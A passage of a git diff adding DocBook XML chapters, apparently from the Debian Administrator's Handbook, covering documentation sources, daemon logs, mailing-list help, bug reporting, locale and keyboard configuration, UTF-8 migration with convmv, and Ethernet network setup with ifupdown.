+				Then, you should look at the software's official documentation — refer to <xref linkend="sect.documentation-sources" /> to identify the various existing documentation sources. The <command>dpkg -L <replaceable>package</replaceable></command> command gives a list of files included in the package; you can therefore quickly identify the available documentation (as well as the configuration files, located in <filename>/etc/</filename>). <command>dpkg -s <replaceable>package</replaceable></command> displays the package meta-data and shows any possible recommended or suggested packages; in there, you can find documentation or a utility that will ease the configuration of the software.
+			</para>
+			 <para>
+				Finally, the configuration files are often self-documented by many explanatory comments detailing the various possible values for each configuration setting. So much so that it is sometimes enough to just choose a line to activate from among those available. In some cases, examples of configuration files are provided in the <filename>/usr/share/doc/<replaceable>package</replaceable>/examples/</filename> directory. They may serve as a basis for your own configuration file.
+			</para>
+			 <sidebar> <title><emphasis>DEBIAN POLICY</emphasis> Location of examples</title>
+			 <indexterm>
+				<primary>examples, location</primary>
+			</indexterm>
+			 <para>
+				All examples must be installed in the <filename>/usr/share/doc/<replaceable>package</replaceable>/examples/</filename> directory. This may be a configuration file, program source code (an example of the use of a library), or a data conversion script that the administrator can use in certain cases (such as to initialize a database). If the example is specific to a particular architecture, it should be installed in <filename>/usr/lib/<replaceable>package</replaceable>/examples/</filename> and there should be a link pointing to that file in the <filename>/usr/share/doc/<replaceable>package</replaceable>/examples/</filename> directory.
+			</para>
+			 </sidebar>
+		</section>
+		 <section>
+			<title>Monitoring What Daemons Are Doing</title>
+			 <para>
+				Understanding what a daemon does is somewhat more complicated, since it does not interact directly with the administrator. To check that a daemon is actually working, you need to test it. For example, to check the Apache (web server) daemon, test it with an HTTP request.
+			</para>
+			 <para>
+				To allow such tests, each daemon generally records everything that it does, as well as any errors that it encounters, in what are called “log files” or “system logs”. Logs are stored in <filename>/var/log/</filename> or one of its subdirectories. To know the precise name of a log file for each daemon, see its documentation. Note: a single test is not always sufficient if it does not cover all the possible usage cases; some problems only occur in particular circumstances.
+			</para>
+			 <sidebar> <title><emphasis>TOOL</emphasis> The <command>rsyslogd</command> daemon</title>
+			 <indexterm>
+				<primary><command>syslogd</command></primary>
+			</indexterm>
+			 <indexterm>
+				<primary>logs</primary>
+				<secondary>files</secondary>
+			</indexterm>
+			 <indexterm>
+				<primary>files</primary>
+				<secondary>logs</secondary>
+			</indexterm>
+			 <para>
+				<command>rsyslogd</command> is special: it collects logs (internal system messages) that are sent to it by other programs. Each log entry is associated with a subsystem (e-mail, kernel, authentication, etc.) and a priority; <command>rsyslogd</command> processes these two pieces of information to decide on what to do. The log message may be recorded in various log files, and/or sent to an administration console. The details are defined in the <filename>/etc/rsyslog.conf</filename> configuration file (documented in the manual page of the same name).
+			</para>
+			 <para>
+				Certain C functions, which are specialized in sending logs, simplify the use of the <command>rsyslogd</command> daemon. However some daemons manage their own log files (this is the case, for example, of <command>samba</command>, that implements Windows shares on Linux).
+			</para>
+			 <para>
+				Note that when <command>systemd</command> is in use, the logs are actually collected by <command>systemd</command> before being forwarded to <command>rsyslogd</command>. They are thus also available via <command>systemd</command>'s journal and can be consulted with <command>journalctl</command> (see <xref linkend="sect.systemd" /> for details).
+			</para>
+			 </sidebar> <sidebar> <title><emphasis>BACK TO BASICS</emphasis> Daemon</title>
+			 <indexterm>
+				<primary>daemon</primary>
+			</indexterm>
+			 <para>
+				A daemon is a program that is not explicitly invoked by the user and that stays in the background, waiting for a certain condition to be met before performing a task. Many server programs are daemons, a term that explains that the letter “d” is frequently present at the end of their name (<command>sshd</command>, <command>smtpd</command>, <command>httpd</command>, etc.).
+			</para>
+			 </sidebar> <para>
+				As a preventive operation, the administrator should regularly read the most relevant server logs. They can thus diagnose problems before they are even reported by disgruntled users. Indeed users may sometimes wait for a problem to occur repeatedly over several days before reporting it. In many cases, there are specific tools to analyze the contents of the larger log files. In particular, such utilities exist for web servers (such as <command>analog</command>, <command>awstats</command>, <command>webalizer</command> for Apache), for FTP servers, for proxy/cache servers, for firewalls, for e-mail servers, for DNS servers, and even for print servers. Other tools, such as <command>logcheck</command> (a software discussed in <xref linkend="security" />), scan these files in search of alerts to be dealt with.
+			</para>
+			 <indexterm>
+				<primary><command>analog</command></primary>
+			</indexterm>
+			 <indexterm>
+				<primary><command>awtats</command></primary>
+			</indexterm>
+			 <indexterm>
+				<primary><command>webalizer</command></primary>
+			</indexterm>
+			 <indexterm>
+				<primary><command>logcheck</command></primary>
+			</indexterm>
+
+		</section>
+		 <section>
+			<title>Asking for Help on a Mailing List</title>
+			 <para>
+				If your various searches haven't helped you to get to the root of a problem, it is possible to get help from other, perhaps more experienced people. This is exactly the purpose of the <email>debian-user@lists.debian.org</email> mailing list. As with any community, it has rules that need to be followed. Before asking any question, you should check that your problem isn't already covered by recent discussions on the list or by any official documentation. <ulink type="block" url="https://wiki.debian.org/DebianMailingLists" /> <ulink type="block" url="https://lists.debian.org/debian-user/" />
+			</para>
+			 <indexterm>
+				<primary><email>debian-user@lists.debian.org</email>
+				</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>mailing lists</primary>
+			</indexterm>
+			 <sidebar> <title><emphasis>BACK TO BASICS</emphasis> Netiquette applies</title>
+			 <para>
+				In general, for all correspondence on e-mail lists, the rules of Netiquette should be followed. This term refers to a set of common sense rules, from common courtesy to mistakes that should be avoided. <ulink type="block" url="http://tools.ietf.org/html/rfc1855" /> <indexterm><primary>Netiquette</primary></indexterm>
+			</para>
+			 <para>
+				Furthermore, for any communication channel managed by the Debian project, you are bound by the Debian Code of Conduct: <ulink type="block" url="https://www.debian.org/code_of_conduct" />
+			</para>
+			 </sidebar> <para>
+				Once those two conditions are met, you can think of describing your problem to the mailing list. Include as much relevant information as possible: various tests conducted, documentation consulted, how you attempted to diagnose the problem, the packages concerned or those that may be involved, etc. Check the Debian Bug Tracking System (BTS, described in sidebar <xref linkend="sidebar.bts" />) for similar problems, and mention the results of that search, providing links to bugs found. BTS starts on: <ulink type="block" url="http://www.debian.org/Bugs/index.html" />
+			</para>
+			 <para>
+				The more courteous and precise you have been, the greater your chances are of getting an answer, or, at least, some elements of response. If you receive relevant information by private e-mail, think of summarizing this information publicly so that others can benefit. This also allows the list's archives, searched through various search engines, to show the resolution for others who may have the same question.
+			</para>
+
+		</section>
+		 <section>
+			<title>Reporting a Bug When a Problem Is Too Difficult</title>
+			 <indexterm>
+				<primary>report a bug</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>bug report</primary>
+			</indexterm>
+			 <para>
+				If all of your efforts to resolve a problem fail, it is possible that a resolution is not your responsibility, and that the problem is due to a bug in the program. In this case, the proper procedure is to report the bug to Debian or directly to the upstream developers. To do this, isolate the problem as much as possible and create a minimal test situation in which it can be reproduced. If you know which program is the apparent cause of the problem, you can find its corresponding package using the command, <command>dpkg -S <replaceable>file_in_question</replaceable></command>. Check the Bug Tracking System (<literal>https://bugs.debian.org/<replaceable>package</replaceable></literal>) to ensure that the bug has not already been reported. You can then send your own bug report, using the <command>reportbug</command> command, including as much information as possible, especially a complete description of those minimal test cases that will allow anyone to recreate the bug.
+			</para>
+			 <para>
+				The elements of this chapter are a means of effectively resolving issues that the following chapters may bring about. Use them as often as necessary!
+			</para>
+
+		</section>
+
+	</section>
+</chapter>
+
diff --git a/tmp/cs-CZ/xml/08_basic-configuration.xml b/tmp/cs-CZ/xml/08_basic-configuration.xml
new file mode 100644
index 000000000..d0712fd03
--- /dev/null
+++ b/tmp/cs-CZ/xml/08_basic-configuration.xml
@@ -0,0 +1,2208 @@
+<?xml version='1.0' encoding='utf-8' ?>
+<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.5//EN" "http://www.oasis-open.org/docbook/xml/4.5/docbookx.dtd" [
+]>
+<chapter id="basic-configuration" lang="cs-CZ">
+	<chapterinfo>
+		 <keywordset>
+			<keyword>Configuration</keyword>
+			 <keyword>Localization</keyword>
+			 <keyword>Locales</keyword>
+			 <keyword>Network</keyword>
+			 <keyword>Name resolution</keyword>
+			 <keyword>Users</keyword>
+			 <keyword>Groups</keyword>
+			 <keyword>Accounts</keyword>
+			 <keyword>Command-line interpreter</keyword>
+			 <keyword>Shell</keyword>
+			 <keyword>Printing</keyword>
+			 <keyword>Bootloader</keyword>
+			 <keyword>Kernel compiling</keyword>
+
+		</keywordset>
+
+	</chapterinfo>
+	 <title>Basic Configuration: Network, Accounts, Printing...</title>
+	 <highlights> <para>
+		A computer with a new installation created with <command>debian-installer</command> is intended to be as functional as possible, but many services still have to be configured. Furthermore, it is always good to know how to change certain configuration elements defined during the initial installation process.
+	</para>
+	 </highlights> <para>
+		This chapter reviews everything included in what we could call the “basic configuration”: networking, language and locales, users and groups, printing, mount points, etc.
+	</para>
+	 <section id="sect.config-language-support">
+		<title>Configuring the System for Another Language</title>
+		 <indexterm>
+			<primary>French localization</primary>
+		</indexterm>
+		 <para>
+			If the system was installed using French, the machine will probably already have French set as the default language. But it is good to know what the installer does to set the language, so that later, if the need arises, you can change it.
+		</para>
+		 <sidebar> <title><emphasis>TOOL</emphasis> The <command>locale</command> command to display the current configuration</title>
+		 <para>
+			The <command>locale</command> command lists a summary of the current configuration of various locale parameters (date format, numbers format, etc.), presented in the form of a group of standard environment variables dedicated to the dynamic modification of these settings.
+		</para>
+		 </sidebar> <section id="sect.default-language">
+			<title>Setting the Default Language</title>
+			 <indexterm>
+				<primary>locales</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>language</primary>
+			</indexterm>
+			 <indexterm>
+				<primary><command>locale-gen</command></primary>
+			</indexterm>
+			 <para>
+				A locale is a group of regional settings. This includes not only the language for text, but also the format for displaying numbers, dates, times, and monetary sums, as well as the alphabetical comparison rules (to properly account for accented characters). Although each of these parameters can be specified independently from the others, we generally use a locale, which is a coherent set of values for these parameters corresponding to a “region” in the broadest sense. These locales are usually indicated under the form, <literal><replaceable>language-code</replaceable>_<replaceable>COUNTRY-CODE</replaceable></literal>, sometimes with a suffix to specify the character set and encoding to be used. This enables consideration of idiomatic or typographical differences between different regions with a common language.
+			</para>
+			 <sidebar> <title><emphasis>CULTURE</emphasis> Character sets</title>
+			 <indexterm>
+				<primary>character set</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>encoding</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>ISO-8859-1</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>ISO-8859-15</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>Latin 1</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>Latin 9</primary>
+			</indexterm>
+			 <para>
+				Historically, each locale has an associated “character set” (group of known characters) and a preferred “encoding” (internal representation for characters within the computer).
+			</para>
+			 <para>
+				The most popular encodings for latin-based languages were limited to 256 characters because they opted to use a single byte for each character. Since 256 characters was not enough to cover all European languages, multiple encodings were needed, and that is how we ended up with <emphasis>ISO-8859-1</emphasis> (also known as “Latin 1”) up to <emphasis>ISO-8859-15</emphasis> (also known as “Latin 9”), among others.
+			</para>
+			 <para>
+				Working with foreign languages often implied regular switches between various encodings and character sets. Furthermore, writing multilingual documents led to further, almost intractable problems. Unicode (a super-catalog of nearly all writing systems from all of the world's languages) was created to work around this problem. One of Unicode's encodings, UTF-8, retains all 128 ASCII symbols (7-bit codes), but handles other characters differently. Those are preceded by a specific escape sequence of a few bits, which implicitly defines the length of the character. This allows encoding all Unicode characters on a sequence of one or more bytes. Its use has been popularized by the fact that it is the default encoding in XML documents.
+			</para>
+			 <indexterm>
+				<primary>ASCII</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>UTF-8</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>Unicode</primary>
+			</indexterm>
+			 <para>
+				This is the encoding that should generally be used, and is thus the default on Debian systems.
+			</para>
+			 </sidebar> <para>
+				The <emphasis role="pkg">locales</emphasis> package includes all the elements required for proper functioning of “localization” of various applications. During installation, this package will ask to select a set of supported languages. This set can be changed at any time by running <command>dpkg-reconfigure locales</command> as root.
+			</para>
+			 <para>
+				The first question invites you to select “locales” to support. Selecting all English locales (meaning those beginning with “<literal>en_</literal>”) is a reasonable choice. Do not hesitate to also enable other locales if the machine will host foreign users. The list of locales enabled on the system is stored in the <filename>/etc/locale.gen</filename> file. It is possible to edit this file by hand, but you should run <command>locale-gen</command> after any modifications. It will generate the necessary files for the added locales to work, and remove any obsolete files.
+			</para>
+			 <para>
+				The second question, entitled “Default locale for the system environment”, requests a default locale. The recommended choice in the U.S.A. is “<literal>en_US.UTF-8</literal>”. British English speakers will prefer “<literal>en_GB.UTF-8</literal>”, and Canadians will prefer either “<literal>en_CA.UTF-8</literal>” or, for French, “<literal>fr_CA.UTF-8</literal>”. The <filename>/etc/default/locale</filename> file will then be modified to store this choice. From there, it is picked up by all user sessions since PAM will inject its content in the <varname>LANG</varname> environment variable.
+			</para>
+			 <indexterm>
+				<primary>environment</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>locale</primary>
+			</indexterm>
+			 <indexterm>
+				<primary><varname>LANG</varname></primary>
+			</indexterm>
+			 <sidebar id="sidebar.intro-pam"> <title><emphasis>BEHIND THE SCENES</emphasis> <filename>/etc/environment</filename> and <filename>/etc/default/locale</filename></title>
+			 <para>
+				The <filename>/etc/environment</filename> file provides the <command>login</command>, <command>gdm</command>, or even <command>ssh</command> programs with the correct environment variables to be created.
+			</para>
+			 <para>
+				These applications do not create these variables directly, but rather via a PAM (<filename>pam_env.so</filename>) module. PAM (Pluggable Authentication Module) is a modular library centralizing the mechanisms for authentication, session initialization, and password management. See <xref linkend="sect.config-pam" /> for an example of PAM configuration.
+			</para>
+			 <para>
+				The <filename>/etc/default/locale</filename> file works in a similar manner, but contains only the <varname>LANG</varname> environment variable. Thanks to this split, some PAM users can inherit a complete environment without localization. Indeed, it is generally discouraged to run server programs with localization enabled; on the other hand, localization and regional settings are recommended for programs that open user sessions.
+			</para>
+			 <indexterm>
+				<primary>PAM</primary>
+			</indexterm>
+			 <indexterm>
+				<primary><filename>pam_env.so</filename></primary>
+			</indexterm>
+			 </sidebar>
+		</section>
+		 <section id="sect.keyboard-config">
+			<title>Configuring the Keyboard</title>
+			 <indexterm>
+				<primary>keyboard layout</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>layout, keyboard</primary>
+			</indexterm>
+			 <para>
+				Even if the keyboard layout is managed differently in console and graphical mode, Debian offers a single configuration interface that works for both: it is based on debconf and is implemented in the <emphasis role="pkg">keyboard-configuration</emphasis> package. Thus the <command>dpkg-reconfigure keyboard-configuration</command> command can be used at any time to reset the keyboard layout.
+			</para>
+			 <indexterm>
+				<primary><emphasis>console-data</emphasis></primary>
+			</indexterm>
+			 <indexterm>
+				<primary><emphasis>console-tools</emphasis></primary>
+			</indexterm>
+			 <indexterm>
+				<primary><emphasis>keyboard-configuration</emphasis></primary>
+			</indexterm>
+			 <para>
+				<indexterm><primary><literal>azerty</literal></primary></indexterm>The questions are relevant to the physical keyboard layout (a standard PC keyboard in the US will be a “Generic 104 key”), then the layout to choose (generally “US”), and then the position of the AltGr key (right Alt). Finally comes the question of the key to use for the “Compose key”, which allows for entering special characters by combining keystrokes. Type successively <keycombo action="seq"><keycap>Compose</keycap><keycap>'</keycap><keycap>e</keycap></keycombo> and produce an e-acute (“é”). All these combinations are described in the <filename>/usr/share/X11/locale/en_US.UTF-8/Compose</filename> file (or another file, determined according to the current locale indicated by <filename>/usr/share/X11/locale/compose.dir</filename>).
+			</para>
+			 <indexterm>
+				<primary><literal>Compose</literal>, key</primary>
+			</indexterm>
+			 <indexterm>
+				<primary><literal>Meta</literal>, key</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>key</primary>
+				<secondary><literal>Meta</literal></secondary>
+			</indexterm>
+			 <indexterm>
+				<primary>key</primary>
+				<secondary><literal>Compose</literal></secondary>
+			</indexterm>
+			 <para>
+				Note that the keyboard configuration for graphical mode described here only affects the default layout; the GNOME and KDE Plasma environments, among others, provide a keyboard control panel in their preferences allowing each user to have their own configuration. Some additional options regarding the behavior of some particular keys are also available in these control panels.
+			</para>
+
+		</section>
+		 <section id="sect.utf8-migration">
+			<title>Migrating to UTF-8</title>
+			 <para>
+				The generalization of UTF-8 encoding has been a long awaited solution to numerous difficulties with interoperability, since it facilitates international exchange and removes the arbitrary limits on characters that can be used in a document. The one drawback is that it had to go through a rather difficult transition phase. Since it could not be completely transparent (that is, it could not happen at the same time all over the world), two conversion operations were required: one on file contents, and the other on filenames. Fortunately, the bulk of this migration has been completed and we discuss it largely for reference.
+			</para>
+			 <sidebar> <title><emphasis>CULTURE</emphasis> <foreignphrase>Mojibake</foreignphrase> and interpretation errors</title>
+			 <para>
+				When a text is sent (or stored) without encoding information, it is not always possible for the recipient to know with certainty what convention to use for determining the meaning of a set of bytes. You can usually get an idea by getting statistics on the distribution of values present in the text, but that doesn't always give a definite answer. When the encoding system chosen for reading differs from that used in writing the file, the bytes are mis-interpreted, and you get, at best, errors on some characters, or, at worst, something completely illegible.
+			</para>
+			 <para>
+				Thus, if a French text appears normal with the exception of accented letters and certain symbols which appear to be replaced with sequences of characters like “é” or è” or “ç”, it is probably a file encoded as UTF-8 but interpreted as ISO-8859-1 or ISO-8859-15. This is a sign of a local installation that has not yet been migrated to UTF-8. If, instead, you see question marks instead of accented letters — even if these question marks seem to also replace a character that should have followed the accented letter — it is likely that your installation is already configured for UTF-8 and that you have been sent a document encoded in Western ISO.
+			</para>
+			 <para>
+				So much for “simple” cases. These cases only appear in Western culture, since Unicode (and UTF-8) was designed to maximize the common points with historical encodings for Western languages based on the Latin alphabet, which allows recognition of parts of the text even when some characters are missing.
+			</para>
+			 <para>
+				In more complex configurations, which, for example, involve two environments corresponding to two different languages that do not use the same alphabet, you often get completely illegible results — a series of abstract symbols that have nothing to do with each other. This is especially common with Asian languages due to their numerous languages and writing systems. The Japanese word <foreignphrase>mojibake</foreignphrase> has been adopted to describe this phenomenon. When it appears, diagnosis is more complex and the simplest solution is often to simply migrate to UTF-8 on both sides.
+			</para>
+			 </sidebar> <para>
+				As far as file names are concerned, the migration can be relatively simple. The <command>convmv</command> tool (in the package with the same name) was created specifically for this purpose; it allows renaming files from one encoding to another. The use of this tool is relatively simple, but we recommend doing it in two steps to avoid surprises. The following example illustrates a UTF-8 environment containing directory names encoded in ISO-8859-15, and the use of <command>convmv</command> to rename them.
+			</para>
+			 
+<screen><computeroutput>$ </computeroutput><userinput>ls travail/</userinput>
+<computeroutput>Ic?nes  ?l?ments graphiques  Textes
+$ </computeroutput><userinput>convmv -r -f iso-8859-15 -t utf-8 travail/</userinput>
+<computeroutput>Starting a dry run without changes...
+mv "travail/�l�ments graphiques"        "travail/Éléments graphiques"
+mv "travail/Ic�nes"     "travail/Icônes"
+No changes to your files done. Use --notest to finally rename the files.
+$ </computeroutput><userinput>convmv -r --notest -f iso-8859-15 -t utf-8 travail/</userinput>
+<computeroutput>mv "travail/�l�ments graphiques"        "travail/Éléments graphiques"
+mv "travail/Ic�nes"     "travail/Icônes"
+Ready!
+$ </computeroutput><userinput>ls travail/</userinput>
+<computeroutput>Éléments graphiques  Icônes  Textes</computeroutput></screen>
+			 <para>
+				For the file content, conversion procedures are more complex due to the vast variety of existing file formats. Some file formats include encoding information that facilitates the tasks of the software used to treat them; it is sufficient, then, to open these files and re-save them specifying UTF-8 encoding. In other cases, you have to specify the original encoding (ISO-8859-1 or “Western”, or ISO-8859-15 or “Western (Euro)”, according to the formulations) when opening the file.
+			</para>
+			 <para>
+				For simple text files, you can use <command>recode</command> (in the package of the same name) which allows automatic recoding. This tool has numerous options so you can play with its behavior. We recommend you consult the documentation, the <citerefentry> <refentrytitle>recode</refentrytitle>
+				 <manvolnum>1</manvolnum> </citerefentry> man page, or the <citerefentry> <refentrytitle>recode</refentrytitle>
+				 </citerefentry> info page (more complete).
+			</para>
+
+		</section>
+
+	</section>
+	 <section id="sect.network-config">
+		<title>Configuring the Network</title>
+		 <sidebar id="sidebar.networking-basics"> <title><emphasis>BACK TO BASICS</emphasis> Essential network concepts (Ethernet, IP address, subnet, broadcast)</title>
+		 <indexterm>
+			<primary>Ethernet</primary>
+		</indexterm>
+		 <indexterm>
+			<primary>10BASE-T</primary>
+		</indexterm>
+		 <indexterm>
+			<primary>100BASE-T</primary>
+		</indexterm>
+		 <indexterm>
+			<primary>1000BASE-T</primary>
+		</indexterm>
+		 <indexterm>
+			<primary>10GBASE-T</primary>
+		</indexterm>
+		 <indexterm>
+			<primary>connector, RJ45</primary>
+		</indexterm>
+		 <indexterm>
+			<primary>RJ45 connector</primary>
+		</indexterm>
+		 <para>
+			Most modern local networks use the Ethernet protocol, where data is split into small blocks called frames and transmitted on the wire one frame at a time. Data speeds vary from 10 Mb/s for older Ethernet cards to 10 Gb/s in the newest cards (with the most common rate currently growing from 100 Mb/s to 1 Gb/s). The most widely used cables are called 10BASE-T, 100BASE-T, 1000BASE-T or 10GBASE-T depending on the throughput they can reliably provide (the T stands for “twisted pair”); those cables end in an RJ45 connector. There are other cable types, used mostly for speeds of 1 Gb/s and above.
+		</para>
+		 <indexterm>
+			<primary>address, IP address</primary>
+		</indexterm>
+		 <indexterm>
+			<primary>IP address</primary>
+		</indexterm>
+		 <para>
+			An IP address is a number used to identify a network interface on a computer on a local network or the Internet. In the currently most widespread version of IP (IPv4), this number is encoded in 32 bits, and is usually represented as 4 numbers separated by periods (e.g. <literal>192.168.0.1</literal>), each number being between 0 and 255 (inclusive, which corresponds to 8 bits of data). The next version of the protocol, IPv6, extends this addressing space to 128 bits, and the addresses are generally represented as a series of hexadecimal numbers separated by colons (e.g., 2001:0db8:13bb:0002:0000:0000:0000:0020, or 2001:db8:13bb:2::20 for short).
+		</para>
+		 <indexterm>
+			<primary>subnet</primary>
+		</indexterm>
+		 <indexterm>
+			<primary>mask</primary>
+			<secondary>subnet mask</secondary>
+		</indexterm>
+		 <indexterm>
+			<primary>network</primary>
+			<secondary>address</secondary>
+		</indexterm>
+		 <para>
+			A subnet mask (netmask) defines in its binary code which portion of an IP address corresponds to the network, the remainder specifying the machine. In the example of configuring a static IPv4 address given here, the subnet mask, <literal>255.255.255.0</literal> (24 “1”s followed by 8 “0”s in binary representation) indicates that the first 24 bits of the IP address correspond to the network address, and the other 8 are specific to the machine. In IPv6, for readability, only the number of “1”s is expressed; the netmask for an IPv6 network could, thus, be <literal>64</literal>.
+		</para>
+		 <para>
+			The network address is an IP address in which the part describing the machine's number is 0. The range of IPv4 addresses in a complete network is often indicated by the syntax, <emphasis>a.b.c.d/e</emphasis>, in which <emphasis>a.b.c.d</emphasis> is the network address and <emphasis>e</emphasis> is the number of bits affected to the network part in an IP address. The example network would thus be written: <literal>192.168.0.0/24</literal>. The syntax is similar in IPv6: <literal>2001:db8:13bb:2::/64</literal>.
+		</para>
+		 <indexterm>
+			<primary>router</primary>
+		</indexterm>
+		 <indexterm>
+			<primary>bridge</primary>
+		</indexterm>
+		 <para>
+			A router is a machine that connects several networks to each other. All traffic coming through a router is guided to the correct network. To do this, the router analyzes incoming packets and redirects them according to the IP address of their destination. The router is often known as a gateway; in this configuration, it works as a machine that helps reach out beyond a local network (towards an extended network, such as the Internet).
+		</para>
+		 <indexterm>
+			<primary>broadcast</primary>
+		</indexterm>
+		 <para>
+			The special broadcast address connects all the stations in a network. Almost never “routed”, it only functions on the network in question. Specifically, it means that a data packet addressed to the broadcast never passes through the router.
+		</para>
+		 <para>
+			This chapter focuses on IPv4 addresses, since they are currently the most commonly used. The details of the IPv6 protocol are approached in <xref linkend="sect.ipv6" />, but the concepts remain the same.
+		</para>
+		 </sidebar> <para>
+			The network is automatically configured during the initial installation. If Network Manager gets installed (which is generally the case for full desktop installations), then it might be that no configuration is actually required (for example, if you rely on DHCP on a wired connection and have no specific requirements). If a configuration is required (for example for a WiFi interface), then it will create the appropriate file in <filename>/etc/NetworkManager/system-connections/</filename>.
+		</para>
+		 <para>
+			If Network Manager is not installed, then the installer will configure <emphasis role="pkg">ifupdown</emphasis> by creating the <filename>/etc/network/interfaces</filename> file. A line starting with <literal>auto</literal> gives a list of interfaces to be automatically configured on boot by the <literal>networking</literal> service.
+		</para>
+		 <para>
+			In a server context, <emphasis role="pkg">ifupdown</emphasis> is thus the network configuration tool that you usually get. That is why we will cover it in the next sections.
+		</para>
+		 <indexterm>
+			<primary>network</primary>
+			<secondary>configuration</secondary>
+		</indexterm>
+		 <indexterm>
+			<primary>configuration</primary>
+			<secondary>of the network</secondary>
+		</indexterm>
+		 <indexterm>
+			<primary>interface</primary>
+			<secondary>network interface</secondary>
+		</indexterm>
+		 <sidebar> <title><emphasis>ALTERNATIVE</emphasis> NetworkManager</title>
+		 <indexterm>
+			<primary><emphasis role="pkg">network-manager</emphasis></primary>
+		</indexterm>
+		 <para>
+			If Network Manager is particularly recommended in roaming setups (see <xref linkend="sect.roaming-network-config" />), it is also perfectly usable as the default network management tool. You can create “System connections” that are used as soon as the computer boots either manually with a <filename>.ini</filename>-like file in <filename>/etc/NetworkManager/system-connections/</filename> or through a graphical tool (<command>nm-connection-editor</command>). Just remember to deactivate all entries in <filename>/etc/network/interfaces</filename> if you want Network Manager to handle them. <ulink type="block" url="https://wiki.gnome.org/Projects/NetworkManager/SystemSettings" /> <ulink type="block" url="https://developer.gnome.org/NetworkManager/1.6/ref-settings.html" />
+		</para>
+		 </sidebar> <section id="sect.interface-ethernet">
+			<title>Ethernet Interface</title>
+			 <para>
+				If the computer has an Ethernet card, the IP network that is associated with it must be configured by choosing from one of two methods. The simplest method is dynamic configuration with DHCP, and it requires a DHCP server on the local network. It may indicate a desired hostname, corresponding to the <literal>hostname</literal> setting in the example below. The DHCP server then sends configuration settings for the appropriate network.
+			</para>
+			 <indexterm>
+				<primary>Ethernet</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>DHCP</primary>
+			</indexterm>
+			 <example id="example.config-dhcp">
+				<title>DHCP configuration</title>
+				 
+<programlisting>
+auto enp0s31f6
+iface enp0s31f6 inet dhcp
+  hostname arrakis
+</programlisting>
+
+			</example>
+			 <sidebar> <title><emphasis>IN PRACTICE</emphasis> Names of network interfaces</title>
+			 <indexterm>
+				<primary><literal>eth0</literal></primary>
+			</indexterm>
+			 <indexterm>
+				<primary><literal>en*</literal></primary>
+			</indexterm>
+			 <indexterm>
+				<primary><literal>wlan0</literal></primary>
+			</indexterm>
+			 <indexterm>
+				<primary><literal>wl*</literal></primary>
+			</indexterm>
+			 <para>
+				By default, the kernel attributes generic names such a <literal>eth0</literal> (for wired Ethernet) or <literal>wlan0</literal> (for WiFi) to the network interfaces. The number in those names is a simple incremental counter representing the order in which they have been detected. With modern hardware, that order might change for each reboot and thus the default names are not reliable.
+			</para>
+			 <para>
+				Fortunately, systemd and udev are able to rename the interfaces as soon as they appear. The default name policy is defined by <filename>/lib/systemd/network/99-default.link</filename> (see <citerefentry><refentrytitle>systemd.link</refentrytitle>
+				<manvolnum>5</manvolnum></citerefentry> for an explanation of the <literal>NamePolicy</literal> entry in that file). In practice, the names are often based on the device's physical location (as guessed by where they are connected) and you will see names starting with <literal>en</literal> for wired ethernet and <literal>wl</literal> for WiFi. In the example above, the rest of the name indicates, in abbreviated form, a PCI (<literal>p</literal>) bus number (<literal>0</literal>), a slot number (<literal>s31</literal>), a function number (<literal>f6</literal>).
+			</para>
+			 <para>
+				Obviously, you are free to override this policy and/or to complement it to customize the names of some specific interfaces. You can find out the names of the network interfaces in the output of <command>ip addr</command> (or as filenames in <filename>/sys/class/net/</filename>).
+			</para>
+			 </sidebar> <para>
+				A “static” configuration must indicate network settings in a fixed manner. This includes at least the IP address and subnet mask; network and broadcast addresses are also sometimes listed. A router connecting to the exterior will be specified as a gateway.
+			</para>
+			 <example id="example.static-network">
+				<title>Static configuration</title>
+				 
+<programlisting>
+auto enp0s31f6
+iface enp0s31f6 inet static
+  address 192.168.0.3
+  netmask 255.255.255.0
+  broadcast 192.168.0.255
+  network 192.168.0.0
+  gateway 192.168.0.1
+</programlisting>
+
+			</example>
+			 <sidebar> <title><emphasis>NOTE</emphasis> Multiple addresses</title>
+			 <para>
+				It is possible not only to associate several interfaces to a single, physical network card, but also several IP addresses to a single interface. Remember also that an IP address may correspond to any number of names via DNS, and that a name may also correspond to any number of numerical IP addresses.
+			</para>
+			 <para>
+				As you can guess, the configurations can be rather complex, but these options are only used in very special cases. The examples cited here are typical of the usual configurations.
+			</para>
+			 </sidebar>
+		</section>
+		 <section id="sect.interface-wireless">
+			<title>Wireless Interface</title>
+			 <indexterm>
+				<primary>wireless</primary>
+			</indexterm>
+			 <para>
+				Getting wireless network cards to work can be a bit more challenging. First of all, they often require the installation of proprietary firmwares which are not installed by default in Debian. Then wireless networks rely on cryptography to restrict access to authorized users only, this implies storing some secret key in the network configuration. Let's tackle those topics one by one.
+			</para>
+			 <section>
+				<title>Installing the required firmwares</title>
+				 <indexterm>
+					<primary>firmware</primary>
+				</indexterm>
+				 <indexterm>
+					<primary>isenkram</primary>
+				</indexterm>
+				 <para>
+					First you have to enable the non-free repository in APT's sources.list file: see <xref linkend="sect.apt-sources.list" /> for details about this file. Many firmware are proprietary and are thus located in this repository. You can try to skip this step if you want, but if the next step doesn't find the required firmware, retry after having enabled the non-free section.
+				</para>
+				 <para>
+					Then you have to install the appropriate <literal>firmware-*</literal> packages. If you don't know which package you need, you can install the <emphasis role="pkg">isenkram</emphasis> package and run its <command>isenkram-autoinstall-firmware</command> command. The packages are often named after the hardware manufacturer or the corresponding kernel module: <emphasis role="pkg">firmware-iwlwifi</emphasis> for Intel wireless cards, <emphasis role="pkg">firmware-atheros</emphasis> for Qualcomm Atheros, <emphasis role="pkg">firmware-ralink</emphasis> for Ralink, etc. A reboot is then recommended because the kernel driver usually looks for the firmware files when it is first loaded and no longer afterwards.
+				</para>
+
+			</section>
+			 <section>
+				<title>Wireless specific entries in <filename>/etc/network/interfaces</filename></title>
